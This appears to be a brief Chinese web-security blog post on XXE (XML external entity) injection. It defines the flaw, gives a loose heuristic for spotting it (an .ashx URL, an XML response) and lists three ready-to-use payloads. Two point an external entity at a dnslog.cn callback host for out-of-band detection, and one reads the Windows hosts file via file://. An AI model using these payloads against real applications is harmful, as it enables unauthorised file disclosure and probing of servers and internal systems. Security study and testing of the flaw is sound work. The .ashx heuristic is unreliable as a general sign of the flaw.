目录

XXE漏洞

Lyrio 收录于类别 Web安全

2023-08-04 2023-08-04 约 161 字预计阅读 1 分钟

目录

XXE漏洞

XXE漏洞——XML外部实体注入漏洞，通常允许攻击者查看应用程序服务器文件系统上的文件，并与应用程序本身可以访问的任何后端或外部系统进行交互。

XXE的特征

URL的后缀是 .ashx
响应体是XML

payload

1
2
3


<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ 
<!ENTITY % xxe SYSTEM "60m4f9.dnslog.cn" > %xxe; ]>

1
2
3
4
5
6


<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "60m4f9.dnslog.cn">
]>
<r>&sp;</r>

1
2
3
4
5
6


<?xml version="1.0" ?>
<!DOCTYPE r [
<!ELEMENT r ANY >
<!ENTITY sp SYSTEM "file:///c:/windows/system32/drivers/etc/hosts">
]>
<r>&sp;</r>